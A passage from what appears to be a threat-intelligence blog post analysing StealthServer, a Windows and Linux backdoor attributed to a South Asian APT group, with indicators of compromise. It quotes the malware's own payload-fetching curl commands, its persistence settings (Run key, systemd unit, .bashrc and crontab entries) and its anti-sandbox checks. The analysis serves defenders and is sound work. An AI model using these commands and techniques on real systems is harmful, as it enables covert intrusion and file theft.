<p>Functionally, StealthServer implements two primary capabilities: exfiltrating files from the compromised host, and executing arbitrary commands issued by the command-and-control (C2) server. In terms of transport, StealthServer actively experiments with different protocols. We have identified three Windows variants: the first two communicate over plain <strong>TCP sockets</strong>, while the third switches to <strong>WebSocket</strong>; Linux samples include two variants that use <strong>HTTP</strong> and <strong>WebSocket</strong> respectively.</p>
<p>One of StealthServer&#x2019;s most notable anti-analysis techniques is the deliberate insertion of large amounts of garbage code and dummy functions to slow down reverse engineering. Some variants also attempt to obscure their network behavior by repeatedly accessing benign whitelist domains such as &quot;google.com&quot; and &quot;microsoft.com&quot;, complicating traffic analysis.</p>
<p>Using our mapping system to search for assets since early June with <strong>Web.Title=&quot;<em>Stealth Server</em>&quot;</strong> revealed several live login webpages. For example, entries whose page title reads <strong>&quot;Stealth Server - Login&quot;</strong> (see figure below). Because StealthServer C2s tend to have short lifetimes and there is limited visibility into commands or widespread infections, this blog will focus primarily on sample analysis, some early <a href="https://www.linkedin.com/posts/pushprajthakre_apt36-cyberespionage-transparenttribe-activity-7364565847383695362-OSk3?ref=blog.xlab.qianxin.com">analysis notes</a> on certain variants can also be used for reference.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/hunter-1.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>Below is the login page for the admin panel.<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/09/StealthServer_BackEnd_Login-1.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<h1 id="correlation-analysis">Correlation Analysis</h1>
<p>Based on the following indicators, it is speculated that this backdoor may have some connection with APT36.</p>
<ol>
<li>
<p>Behavioral characteristics of the sample are consistent with the <a href="https://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/?ref=blog.xlab.qianxin.com">historical patterns</a> of this group: for example, distributing binary ELF files via <strong>.desktop</strong> files that masquerade as PDF shortcuts. The filenames and the PDF content opened by these files often relate to political, procurement, or conference topics &#x2014; typically concerning a certain South Asian country. The PDF URLs usually take the form of Google Drive links.</p>
</li>
<li>
<p>C2 infrastructure shows similarities with that of this group, mainly inferred from domain naming patterns: StealthServer domains often mimic government or official tools of a certain country, such as <code>modindia[.]serveminecraft.net, modgovindia[.]space, kavach[.]space</code>. These domains share structural and resolution similarities with indicators mentioned in <a href="https://hunt.io/blog/apt36-india-infrastructure-attacks?ref=blog.xlab.qianxin.com">recent reports</a> on this group&apos;s infrastructure. For instance, both <code>modindia[.]serveminecraft.net</code> and <code>modgovindia[.]space</code> resolved to <code>101.99.94[.]109</code> in early July. Additionally, in mid-June, another domain <code>zahcomputers.pk[.]modpersonnel.support</code> also resolved to this same IP and no other domain did. These domains closely resemble the phishing domains attributed to this group in earlier reports, such as <code>mod.gov.in[.]defencepersonnel.support</code> and <code>email.gov.in[.]modindia.link</code>. According to <a href="https://www.seqrite.com/blog/advisory-pahalgam-attack-themed-decoys-used-by-apt36-to-target-the-indian-government/?ref=blog.xlab.qianxin.com">a report</a> by SEQRITE in April this year, the group has repeatedly used domains with suffixes like <strong>.support</strong> and <strong>.link</strong> for phishing activities.</p>
</li>
<li>
<p>Some <a href="https://www.cloudsek.com/blog/investigation-report-apt36-malware-campaign-using-desktop-entry-files-and-google-drive-payload-delivery?ref=blog.xlab.qianxin.com">investigation reports</a> and <a href="https://x.com/Cyberteam008/status/1966104752779047237?ref=blog.xlab.qianxin.com">public data</a> from security researchers have also attributed certain C2 servers to this group.</p>
</li>
</ol>
<h1 id="samples-analysis">Samples Analysis</h1>
<p>Samples for both Windows and Linux were developed in Golang, and their build/source paths are nearly identical, generally matching the pattern <code>*/bossmaya/*/obfuscated*.go</code>. Below are some of the development paths we collected.</p>
<pre><code>EXE:
D:/bossmaya/linuxnewdownloader/windows-client/obfuscated_main.go
D:/bossmaya/newblkul/client/client_obfuscated.go
D:/bossmaya/newblkul/client/client.go

ELF:
D:/bossmaya/client/obfuscated_client.go
D:/bossmaya/newlinuxblkul/client/main_obfuscated.go
D:/bossmaya/newlinuxblkul/client/main_obfuscated_enhanced.go
/home/boss/Desktop/tgtfile/main_obfuscated_enhanced.go
</code></pre>
<p>Regarding sample loading, the entry files are presumed to typically appear as .zip attachments in phishing emails. Specifically, the Windows samples use PPT documents containing malicious macros as the loader, while the Linux samples employ the group&#x2019;s customary .desktop files. Although the samples on the two platforms differ slightly in functionality, they still exhibit many common traits: in addition to highly similar development paths, they implement similar virtual environment detection and persistence mechanisms. Overall, the following two points represent the most prominent shared characteristics across both platforms.</p>
<p>(1) Similar code layout: large swaths at the beginning consist of junk code and dummy function calls, while the true core logic is placed near the end, a layout intended to significantly slow down analysis, as illustrated below.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/ProcessGraph.jpg" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>(2) Similar junk-code mechanisms: in addition to placing large amounts of junk code at the start of samples, the authors also insert garbage code around critical routines. Some junk functions share identical implementations, for example, pointless loop computations or meaningless encryption/decryption routines. Below is an implementation of a pointless Fibonacci sequence.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/junk_code.jpg" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<h2 id="windows-v1-tcp"><strong>Windows-V1: TCP</strong></h2>
<h3 id="loader">#Loader</h3>
<p>The first Windows variant appeared in July, its initial delivery was a PPT document named <strong>&quot;PM &amp; Est Sanction Final 2025.ppam&quot;</strong>, which contains a malicious macro that can be extracted with the oledump tool (see figure below). If the user enables macro execution in Office Applications, the macro runs automatically and the execution flow involves two URLs: the first <code>https://filestore[.]space/SoftsCompany/d/11/MES-Presentation</code> is a decoy PPT meant to mislead the user, while the second <code>https://filestore[.]space/SoftsCompany/d/14/nodejs</code> hosts the malicious payload: StealthServer.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Macro.jpg" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<h3 id="stealthserver">#StealthServer</h3>
<h4 id="1-anti-analysis">1. Anti-Analysis</h4>
<p>Besides heavy junk-code obfuscation, StealthServer uses multiple anti-analysis measures and sets up persistence to stay resident.</p>
<h5 id="%EF%BC%881%EF%BC%89anti-debuganti-sandboxes">&#xFF08;1&#xFF09;Anti-Debug/Anti-Sandboxes</h5>
<p>&#x2460; Run the command <code>tasklist /fi &quot;imagename eq %s*&quot; | find /i &quot;%s&quot;</code> to check whether any processes containing the following sandbox- or virtual-machine-related strings are present.</p>
<pre><code>VMware
VirtualBox
VBOX
QEMU
Xen
Hyper-V
Parallels
KVM
Virtual
VM
vbox
vmware
</code></pre>
<p>&#x2461; Call the IsDebuggerPresent() function to determine whether the process is being debugged.<br>
&#x2462; Retrieve the value of PEBDebugFlag to check if the process is under debugging.<br>
&#x2463; Check whether the following directories exist, if they do, the environment is considered an analysis/sandbox environment.</p>
<pre><code>C:\\analysis
C:\\sandbox
C:\\malware
C:\\sample
C:\\virus
C:\\quarantine
</code></pre>
<p>&#x2464; Check whether the current username matches any in the following list, if so, the environment is considered an analysis/sandbox environment.</p>
<pre><code>admin
administrator
sandbox
malware
virus
user
test
analyst
john
jane
</code></pre>
<h5 id="%EF%BC%882%EF%BC%89interfere-with-traffic-analysis">&#xFF08;2&#xFF09;Interfere with traffic analysis</h5>
<p>Repeatedly requests the following websites to interfere with traffic analysis.</p>
<pre><code>google.com
microsoft.com
cloudflare.com
amazon.com
facebook.com
httpbin.org
</code></pre>
<h5 id="%EF%BC%883%EF%BC%89hide-the-terminal-window">&#xFF08;3&#xFF09;Hide the terminal window</h5>
<p>Run the following PowerShell command <code>cmd /C powershell -WindowStyle Hidden -Command exit</code> which launches PowerShell with a hidden window and immediately exits.</p>
<h5 id="%EF%BC%884%EF%BC%89mutex-detection">&#xFF08;4&#xFF09;Mutex detection</h5>
<p>Determine whether an instance with the same name is already running by checking a mutex. The sample computes the SHA&#x2011;256 of the string <code>nodejs_instance_mutex</code>, formats the mutex name as <code>Global\%x</code>, and then runs the following command to test it:<br>
<code>cmd /C powershell -Command &quot;$mutex = New-Object System.Threading.Mutex($false, &apos;%s&apos;); if($mutex.WaitOne(0)) { exit 0 } else { exit 1 }&quot;</code><br>
(Exit code 0 indicates the mutex was acquired; exit code 1 indicates an instance already exists.).</p>
<h4 id="2-persistence">2. Persistence</h4>
<h5 id="%EF%BC%881%EF%BC%89hide-files">&#xFF08;1&#xFF09;Hide files</h5>
<p>It copies its file to the <code>%APPData%</code> directory, renames it to <code>nodejs.exe</code>, and runs <code>attrib +h +s</code> to set the hidden and system attributes, making the file invisible.</p>
<h5 id="%EF%BC%882%EF%BC%89add-autostart-registry">&#xFF08;2&#xFF09;Add autostart-registry</h5>
<p>Run <code>reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v nodejs /t REG_SZ /d \&quot;%s\&quot; /f</code> to add nodejs to the current user&#x2019;s <code>Run</code> registry key so nodejs.exe will run at user logon.</p>
<h5 id="%EF%BC%883%EF%BC%89add-to-startup-folder">&#xFF08;3&#xFF09;Add to Startup folder</h5>
<p>Create a .ps1 script named <code>create_shortcut.ps1</code> in the Startup workflow that, when executed, uses PowerShell to create a shortcut System <code>Update.lnk</code> inside the <code>\Microsoft\Windows\Start Menu\Programs\Startup</code> folder. The shortcut points to nodejs.exe, causing the program to launch at user login.</p>
<pre><code>$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(&apos;%s&apos;)
$Shortcut.TargetPath = &apos;%s&apos;
$Shortcut.WorkingDirectory = &apos;%s&apos;
$Shortcut.WindowStyle = 7
$Shortcut.Save()
</code></pre>
<h5 id="%EF%BC%884%EF%BC%89scheduled-task">&#xFF08;4&#xFF09;Scheduled task</h5>
<p>It creates a scheduled task to achieve periodic execution by running: <code>sc create &quot;NodeJSUpdater&quot; binPath= &quot;%s&quot; start= auto DisplayName= &quot;Node.js Background Updater&quot; type= own</code> and <code>sc start &quot;NodeJSUpdater&quot;</code>. This sets up the task NodeJSUpdater to run automatically, with the display name &quot;Node.js Background Updater&quot;, and then starts it immediately.</p>
<h4 id="3-network-communication">3. Network communication</h4>
<p>The sample contacts the server <code>modindia.serveminecraft[.]net</code> over TCP and exchanges data in JSON format on port <code>8080</code>. The check&#x2011;in packet has the following characteristics: the id field is hardcoded in the sample (likely used to tag different batches or versions), the location field is constructed as <code>&quot;windows - &quot;</code> + <code>&lt;hostname&gt;</code>, and the antivirus field conveys the name of any detected AV. The communication logic is intentionally polluted with large amounts of junk code to impede analysis.</p>
<pre><code>{
  &quot;id&quot;: &quot;633734336633383138326436323966326463656638303966363166663933356163363239363364eae2d6e4&quot;,
  &quot;location&quot;: &quot;windows - DAJI0A22&quot;,
  &quot;antivirus&quot;: &quot;Unknown&quot;
}
</code></pre>
<p>It supports the following three commands.</p>
<pre><code>LIST&#xFF1A;Retrieve the file list
UPLOAD&#xFF1A;Upload a specified file
DOWNLOAD&#xFF1A;Download a specified file
</code></pre>
<h2 id="windows-v2-tcp"><strong>Windows-V2: TCP</strong></h2>
<p>At the end of August we discovered another Windows variant named &quot;proxifiersetup.exe&quot;. This variant obfuscated the names of its core functional routines, its build/source path is <code>D:/bossmaya/newblkul/client/client_obfuscated.go</code>, which is the same path used by the Linux version described below. Its banner/messages indicate the variant&#x2019;s name as <code>ULTRA-CLIENT</code>. The core functionality changed only slightly. For example, it added anti&#x2011;debug checks for tools like <code>OllyDbg, x64dbg, IDA</code> and so on while other behaviors remain largely unchanged.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/ULTRA-Client.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>Network communications: the remote C2 uses simple XOR encryption, two other IPs are hardcoded as backups, and all C2 servers listen on port <code>8080</code>.</p>
<pre><code>sinjita[.]store
45.155.54[.]122
45.155.54[.]62
</code></pre>
<p>The check-in packet has changed slightly: an <code>os</code> field was added, the <code>id</code> field is now composed of eight randomly generated bytes, and the three supported commands <code>LIST, UPLOAD, DOWNLOAD</code> remain unchanged.</p>
<pre><code>{
  &quot;id&quot;: &quot;ultra_client_6edc15ad7feac78f&quot;,
  &quot;location&quot;: &quot;Roubaix, Hauts-de-France, France - UltraPC(Rubin)&quot;,
  &quot;os&quot;: &quot;Microsoft Windows [&#xFFFD;&#xE6;&#xB1;&#xBE; 10.0.22621.4317&quot;,
  &quot;antivirus&quot;: &quot;Windows Defender&quot;
}
</code></pre>
<h2 id="windows-v3-websocket"><strong>Windows-V3: WebSocket</strong></h2>
<p>At the end of August we captured another variant that switched to WebSocket for communication. Its C2 server is <code>ws://kavach[.]space:5500</code> and its functionality is identical to the second Linux variant described below, so no further details are provided here.</p>
<h2 id="linux-v1-http"><strong>Linux-V1: HTTP</strong></h2>
<h3 id="loader">#Loader</h3>
<p>The first Linux variant was discovered in early August, the initial dropper was a file named <strong>&quot;Meeting_Ltr_ID1543ops.pdf.desktop&quot;</strong>. A .desktop file is a Linux shortcut or application launcher, analogous to a .lnk shortcut on Windows. The frequent use of .desktop files as loaders to deliver different tools is a distinct behavioral hallmark of this group.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-Loader.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>The .desktop file is masqueraded as a PDF shortcut. It would appear in the desktop as <strong>&quot;Meeting_Ltr_ID1543ops.pdf&quot;</strong>. When executed it launches Firefox on the victim machine and opens a Google Drive page to deceive the user. The Drive document is labeled <strong>&quot;CONFIDENTIAL&quot;</strong> and purports to describe <strong>an alliance between a country&#x2019;s Defence Research and Development Organisation (DRDO) and an Israeli defense company regarding research on glide bombs and high&#x2011;speed systems (including hypersonic propulsion technologies)</strong>. This content aligns with the group&#x2019;s typical phishing themes.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-PDF.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>In reality, it downloads a file named <strong>&quot;Mt_dated_29.txt&quot;</strong> from a remote malicious server, saves it under <code>/tmp</code> with a name formatted like <code>/tmp/Meeting_Ltr_ID1543ops.pdf-$(date +%s)</code>. That file is StealthServer, but encoded as a hexadecimal (HEX) string, the sample uses <code>xxd -r -p</code> to convert it back into a binary ELF, then runs <code>chmod +x</code> on the result and executes it.</p>
<pre><code>curl -s &quot;https://securestore[.]cv/ghg/Mt_dated_29.txt&quot;
</code></pre>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-ELF.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>Another variant&#x2019;s loader encodes URLs as hexadecimal strings instead of Base64. As shown, the variable &quot;a&quot; decodes to <code>https://trmm[.]space/SoftsCompany/d/27/clipboard.txt</code>, &quot;b&quot; decodes to <strong>&quot;firefox&quot;</strong>, and &quot;c&quot; decodes to a misleading PDF link <code>https://drive.google.com/file/d/1C-PH7EEOhv5gjYzKnsz_KGBe48454QGc/view?usp=sharing</code>. Its functionality is the same as previously described, so further details are omitted.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-Another-Sample.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<h3 id="stealthserver">#StealthServer</h3>
<p>Unlike the Windows samples, the Linux build of StealthServer has its functions&apos; names obfuscated and the build/source path is <code>D:/bossmaya/client/obfuscated_client.go</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-Client.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<h5 id="1-junk-codejunk-function">1. Junk code/Junk Function</h5>
<p>Most of the content of the init and main functions consists of junk functions and junk code designed to hinder analysis, the junk code performs meaningless operations of two main types: (1) large no&#x2011;op loops and sleeps that do nothing useful, and (2) repeated compress/encrypt/decrypt cycles applied to a block of meaningless data.</p>
<h5 id="2-anti-debug">2. Anti debug</h5>
<p>Read <code>/proc/self/status</code> and check for the process status field <code>TracerPid: N</code>.</p>
<ul>
<li>If N = 0 &#x2192; the process is not being traced by a debugger.</li>
<li>If N &#x2260; 0 &#x2192; the process is attached to a debugger (for example gdb, strace, etc.).</li>
</ul>
<h5 id="3-persistence">3. Persistence</h5>
<p><strong>&#xFF08;1&#xFF09;Add as a system service</strong></p>
<p>First, create the following directory structure under the current user&#x2019;s home directory, note that <code>/home/username/.config/systemd/user/default.target.wants/system-update.service</code> is a symbolic link pointing to <code>/home/username/.config/systemd/user/system-update.service</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/systemd-service.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>Next, copy its ELF binary to <code>/home/username/.config/systemd/systemd-update</code> and drop the service unit file at <code>/home/username/.config/systemd/user/system-update.service</code>. The intent is to ensure the sample remains running persistently. Finally, the service is started with systemctl, the service file contents are as follows.</p>
<pre><code>[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=/home/username/.config/systemd/systemd-update
Restart=always
RestartSec=10
User=username

[Install]
WantedBy=default.target
</code></pre>
<p><strong>&#xFF08;2&#xFF09;Append startup commands to ~/.bashrc and ~/.profile</strong></p>
<p><code>~/.bashrc</code> is the Bash shell configuration file, which is loaded and executed whenever a new shell session starts. <code>~/.profile</code> is used for environment variables and initialization tasks when the user logs in. The appended commands are intended to launch the sample in the background.</p>
<pre><code># System update service
nohup /home/username/.config/systemd/systemd-update &gt;/dev/null 2&gt;&amp;1 &amp;
</code></pre>
<h5 id="4-network-communication">4. Network communication</h5>
<p>The C2 server is <code>modgovindia[.]space</code>, which resolves to the same IP <code>101.99.94[.]109</code> as the Windows variant&#x2019;s domain <code>modindia.serveminecraft[.]net</code>. The communication flow is as follows. First, the sample issues an HTTP request to <code>http://modgovindia[.]space:4000/health</code> to check whether the server is alive, the service field in the response identifies the tool name.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/health.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>Next, it requests <code>http://modgovindia[.]space:4000/commands</code> to retrieve commands, the response is JSON and supports the three commands listed below. After executing a command, the result is sent back to the C2 via <code>http://modgovindia[.]space:4000/command-response</code>.</p>
<pre><code>1&#xFF09;&apos;browse&apos;
Enumerate files under a specified directory. The response JSON contains a path field indicating the target directory.
2&#xFF09;&apos;upload&apos;
Upload a specified file.
3&#xFF09;&apos;execute&apos;
Execute a Bash command.
</code></pre>
<h5 id="5-file-exfiltration">5. File Exfiltration</h5>
<p>Starting from the root directory <code>/</code>, it recursively searches for files with the following extensions.</p>
<pre><code>.pdf
.doc
.xls
.ppt
.txt
.zip
.rar
</code></pre>
<p>When the scanner encounters a file with one of the above extensions, it first sends a GET request to notify the server, the <code>X-Username</code> header contains the current user&#x2019;s username.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/status-file.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>Then it issues a POST to <code>/upload?last=true</code> to send the file to the remote server. The X-Username header marks the current username so the server can attribute the file to a user, X-File-Name contains the filename encoded in Base64. The file payload is encrypted with AES&#x2011;GCM as follows.</p>
<pre><code>1. A hardcoded string embedded in the sample is hashed with SHA&#x2011;256; the resulting 32&#x2011;byte digest is used as the AES key.
2. A 12&#x2011;byte random value is generated as the GCM nonce; this nonce is sent in the X-Nonce header.
3. AES&#x2011;GCM encrypts the file content; the resulting 16&#x2011;byte authentication tag is appended to the end of the ciphertext.
4. The complete blob (ciphertext || 16&#x2011;byte tag) is sent in the POST body.
</code></pre>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/upload.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>In the example shown, the sample&#x2019;s hardcoded AES key string is: <code>617d6e6f298505d2855f3f85e30a971a01bee4fb9417456d2e11090e170e80ea</code>. Using that value allows recovery of the original file contents shown below.&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/file-content.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<h2 id="linux-v2-websocket"><strong>Linux-V2: WebSocket</strong></h2>
<h3 id="loader">#Loader</h3>
<p>In mid&#x2011;August we discovered another Linux variant whose dropper is a file named <strong>&quot;PROCUREMENT_OF_MANPORTABLE_&amp;COMPAC.pdf.desktop&quot;</strong>. The .desktop file contains over 3,000 lines of comments, with the actual executable commands embedded in the middle of the file. The execution logic is essentially the same as the HTTP&#x2011;based Linux samples, except that the cmd instructions are Base64&#x2011;encoded.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/linux-v2.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>Similarly, it opens Firefox to load the following Google Drive page to deceive the user, a document titled <strong>&quot;Draft RFI for PDS 18 Aug 25 Final.pdf&quot;</strong>, which purports to be <strong>&quot;a draft Request for Information (RFI) concerning the procurement of a &quot;Lightweight, Portable Passive Detection and Countermeasure System (LWPD&#x2011;CMS)&quot;&quot;</strong>.</p>
<pre><code>firefox --new-window &quot;https://drive.google.com/file/d/1kn0L_6WYbfUUx0dmzwfALDnzkVHJAPTu/view?usp=drive_link&quot;
</code></pre>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-v2-PDF.png" alt="StealthServer: A Dual-Platform Backdoor from a South Asian APT Group" loading="lazy"></p>
<p>The StealthServer payload is again delivered as a hexadecimal string file, it is converted back into an ELF binary with <code>xxd -r -p</code>, given execute permissions, and then launched.</p>
<pre><code>eaMXJW=&quot;--fail --location --show-error&quot;; curl ${eaMXJW} &quot;https://drive.google.com/uc?export=download&amp;id=1VQQiTt78N3KpYJzVbE-95uILnO84Wz_-&quot; | xxd -r -p
</code></pre>
<h3 id="stealthserver">#StealthServer</h3>
<p>The development path for this variant is <code>D:/bossmaya/newlinuxblkul/client/main_obfuscated_enhanced.go</code>, labeled as an enhanced build. It likewise contains abundant junk code, but function names are not obfuscated.</p>
<h5 id="1-persistence">1. Persistence</h5>
<p>Differently from other variants, this build accepts a <code>&quot;--hidden&quot;</code> argument when this flag is provided the persistence routine is skipped. The persistence logic copies its ELF binary to the <code>~/.config/system-backup/</code> directory, then adds a crontab entry <code>@reboot %s &gt; /dev/null 2&gt;&amp;1</code>, which causes the copied ELF to run automatically on each reboot while fully suppressing its output. The sample also installs a systemd unit named <code>system-backup.service</code> to ensure continuous execution.</p>
<pre><code>[Unit]
Description=System Backup Service
After=network.target

[Service]
Type=simple
ExecStart=%s
Restart=always
RestartSec=10
User=%s

[Install]
WantedBy=default.target
</code></pre>
<h5 id="2-network-communication">2. Network Communication</h5>
<p>The variant&#x2019;s transport switched to WebSocket, but payloads remain JSON&#x2011;formatted. The C2 address is Base64&#x2011;encoded as <code>d3M6Ly9zZWVteXNpdGVsaXZlLnN0b3JlOjgwODAvd3M=</code>, which decodes to:<br>
<code>ws://seemysitelive[.]store:8080/ws</code>. Upon successful connection the client responds with an initial message that includes the string <code>&quot;Welcome to Stealth Server&quot;</code>.</p>
<pre><code>{
  &quot;type&quot;: &quot;welcome&quot;,
  &quot;client_id&quot;: &quot;fd77350b-d70b-4978-bc54-bc5b16843904&quot;,
  &quot;data&quot;: &quot;Welcome to Stealth Server&quot;,
  &quot;timestamp&quot;: &quot;2025-08-20T03:04:07.8960862-07:00&quot;
}
</code></pre>
<p>And then send the information of the client like below to the C2.</p>
<pre><code>{
  &quot;type&quot;: &quot;client_info&quot;,
  &quot;client_id&quot;: &quot;7a8dfc96-eea9-4c46-8e48-0ddb2dd2be41&quot;,
  &quot;data&quot;: {
    &quot;current_dir&quot;: &quot;/tmp&quot;,
    &quot;hostname&quot;: &quot;buffalo&quot;,
    &quot;ip_address&quot;: &quot;35.*.*.48&quot;,
    &quot;location&quot;: &quot;Council Bluffs, Iowa, United States&quot;,
    &quot;os&quot;: &quot;linux&quot;,
    &quot;username&quot;: &quot;root&quot;
  },
  &quot;timestamp&quot;: &quot;2025-08-20T10:04:07.538478245Z&quot;
}
</code></pre>
<p>Afterwards, the client and server exchange heartbeat messages with each other every 30 seconds.</p>
<pre><code>response&#xFF1A;
{
  &quot;type&quot;: &quot;heartbeat&quot;,
  &quot;timestamp&quot;: &quot;2025-08-20T03:04:37.8972773-07:00&quot;
}

sendto&#xFF1A;
{
  &quot;type&quot;: &quot;heartbeat_response&quot;,
  &quot;client_id&quot;: &quot;7a8dfc96-eea9-4c46-8e48-0ddb2dd2be41&quot;,
  &quot;timestamp&quot;: &quot;2025-08-20T10:04:36.244598102Z&quot;
}
</code></pre>
<p>It supports the following commands.</p>
<pre><code>browse_files
upload_execute
start_collection
ping
welcome
heartbeat
</code></pre>
<h1 id="conclusion">Conclusion</h1>
<p>This group&#x2019;s operations are frequent and characterized by a wide variety of tools, numerous variants, and a high delivery cadence. If you&#x2019;re interested in this topic, feel free to contact us via <a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X</a>.</p>
<h1 id="ioc">IoC</h1>
<pre><code>Samples&#xFF1A;
dc64c34ba92375f8dc8ae8cf90a1f535a0aa5a29fcf965af5ad4982cd16e9d71
8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1
6347f46d77a47b90789a1209b8f573b2529a6084f858a27d977bf23ee8a79113
662890bb5baba4a7a9ba718bdedd6991fbf9867c83e676172f5527617e05cafa
264d88624ec527458d4734eff6f1e534fcacb77e5616ae61abed94a941389232
56260e90bba2c50af7c6d82e8656224ece23445f1d76e87a97c938ad9883005f
499f16ed2def90b3d4c0de5ca22d8c8080c26a1a405b4078e262a0a34bcb1e31
7a946339439eb678316a124b8d700b21de919c81ee5bef33e8cb848b7183927b
10b54abba525686869c9da223250f70270a742b1a056424c943cfc438c40cc50
ece1620e218f2c8b68312c874697c183f400c72a42855d885fc00865e0ccc1a1
ab85924ba95692995ac622172ed7f2ebc1997450d86f5245b03491422be2f3d6
cf39bb998db59d3db92114d2235770a4a6c9cbf6354462cfedd1df09e60fe007

Domain&#xFF1A;
modindia[.]serveminecraft.net
modgovindia[.]space
seemysitelive[.]store
solarwindturbine[.]site
sinjita[.]store
sinjita[.]space
seeconnectionalive[.]website
windturbine[.]website 
kavach[.]space
zahcomputers.pk[.]modpersonnel.support
discoverlive[.]site
cloudstore[.]cam

IP&#xFF1A;
45.155.54[.]122	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.155.54[.]62	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.155.54[.]28	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.155.53[.]179	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.155.53[.]204	Switzerland|Zurich|Z&#xFC;rich	AS200019|ALEXHOST SRL
45.141.58[.]199	The Netherlands|Flevoland|Dronten	AS213373|IP Connect Inc
101.99.94[.]109	Bulgaria|Sofia-Capital|Sofia	AS45839|Shinjiru Technology Sdn Bhd
164.215.103[.]55	The Netherlands|Flevoland|Dronten	AS213373|IP Connect Inc
161.97.82[.]97	France|Grand Est|Lauterbourg	AS51167|Contabo GmbH
5.178.0[.]29	The Netherlands|Flevoland|Dronten	AS213373|IP Connect Inc

Golang path&#xFF1A;
D:/bossmaya/linuxnewdownloader/windows-client/obfuscated_main.go
D:/bossmaya/newlinuxblkul/client/main_obfuscated.go
D:/bossmaya/newlinuxblkul/client/main_obfuscated_enhanced.go
D:/bossmaya/client/obfuscated_client.go
D:/bossmaya/newblkul/client/client.go
D:/bossmaya/newblkul/client/client_obfuscated.go
/home/boss/Desktop/tgtfile/main_obfuscated_enhanced.go
</code></pre>
]]></content:encoded></item><item><title><![CDATA[南亚某组织的双平台后门：StealthServer]]></title><description><![CDATA[<p>&#x5357;&#x4E9A;&#x5730;&#x533A;&#x957F;&#x671F;&#x4EE5;&#x6765;&#x90FD;&#x662F;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x7684;&#x9AD8;&#x53D1;&#x5730;&#x5E26;&#xFF0C;&#x591A;&#x4E2A; APT &#x7EC4;&#x7EC7;&#x5728;&#x6B64;&#x6301;&#x7EED;&#x6D3B;&#x8DC3;&#x4E14;&#x653B;&#x51FB;&#x9891;&#x7387;&#x548C;&#x6280;&#x672F;&#x6C34;&#x5E73;&#x4E0D;&#x65AD;&#x63D0;&#x5347;&#xFF0C;&#x6211;&#x4EEC;&#x4E5F;&#x5728;</p>]]></description><link>https://blog.xlab.qianxin.com/apt-stealthserver-cn/</link><guid isPermaLink="false">68c92d3f428efe0001a2550b</guid><category><![CDATA[APT]]></category><category><![CDATA[Backdoor]]></category><dc:creator><![CDATA[daji]]></dc:creator><pubDate>Wed, 15 Oct 2025 02:49:09 GMT</pubDate><content:encoded><![CDATA[<p>&#x5357;&#x4E9A;&#x5730;&#x533A;&#x957F;&#x671F;&#x4EE5;&#x6765;&#x90FD;&#x662F;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x7684;&#x9AD8;&#x53D1;&#x5730;&#x5E26;&#xFF0C;&#x591A;&#x4E2A; APT 